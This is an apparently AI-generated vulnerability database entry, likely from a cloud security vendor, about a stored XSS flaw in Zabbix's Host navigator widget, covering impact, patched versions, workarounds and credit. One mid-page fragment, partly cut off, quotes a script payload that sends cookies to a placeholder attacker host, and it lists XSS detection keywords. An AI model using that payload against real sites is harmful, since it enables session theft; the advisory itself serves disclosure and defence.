
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-23926 is a stored cross-site scripting (XSS) vulnerability in Zabbix's Host navigator widget that allows an authenticated non-super administrator to inject arbitrary JavaScript into maintenance period definitions. The injected payload executes in the browser of any user who opens the tooltip for that maintenance period. Affected versions include Zabbix 7.0.0–7.0.23 and 7.4.0–7.4.7. The vulnerability was disclosed on May 6, 2026, and carries a CVSS v4.0 base score of 7.3 (High) (Zabbix Advisory, GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically a stored XSS variant. An authenticated non-super administrator crafts a maintenance period containing a malicious JavaScript payload in a field that is not properly sanitized before being rendered in the Host navigator widget's tooltip. When any other user hovers over or opens the tooltip for that maintenance period, the payload executes in their browser context, potentially with their session privileges. Exploitation requires the attacker to have non-super administrator credentials and the victim to interact with the Host navigator widget (Zabbix Advisory, GitHub Advisory).
Successful exploitation allows the injected JavaScript to execute in the browser of any user — including super administrators — who views the affected maintenance period tooltip, enabling unauthorized actions on behalf of the victim. Depending on the victim's privilege level, an attacker could escalate privileges, exfiltrate session tokens or sensitive data, perform administrative actions, or pivot to further compromise the Zabbix environment. Confidentiality, integrity, and availability of the vulnerable system are all rated High under CVSS v4.0 (Zabbix Advisory, GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent XSS vector) into a field rendered unsanitized in the tooltip.<script>, onerror, onmouseover, javascript:), or encoded variants (e.g., %3Cscript%3E) in name or description fields.Zabbix has released patched versions 7.0.24 (fixing 7.0.0–7.0.23) and 7.4.8 (fixing 7.4.0–7.4.7); upgrading to these versions is the recommended remediation (Zabbix Advisory). As an immediate workaround, the Host navigator widget can be disabled via Administration → General → Modules to prevent the vulnerable tooltip from being rendered. Additionally, organizations should restrict non-super administrator privileges to create or modify maintenance periods where not operationally required, and monitor for suspicious maintenance period configurations containing embedded scripts.
The vulnerability was acknowledged by Zabbix and credited to researcher Daniel Santos (@bananabr) via the HackerOne bug bounty platform (Zabbix Advisory). It was included in threat landscape digests for Week 19 of 2026 by security intelligence aggregators, indicating moderate community awareness. No significant vendor statements beyond the official advisory or notable researcher commentary beyond the discoverer's credit have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."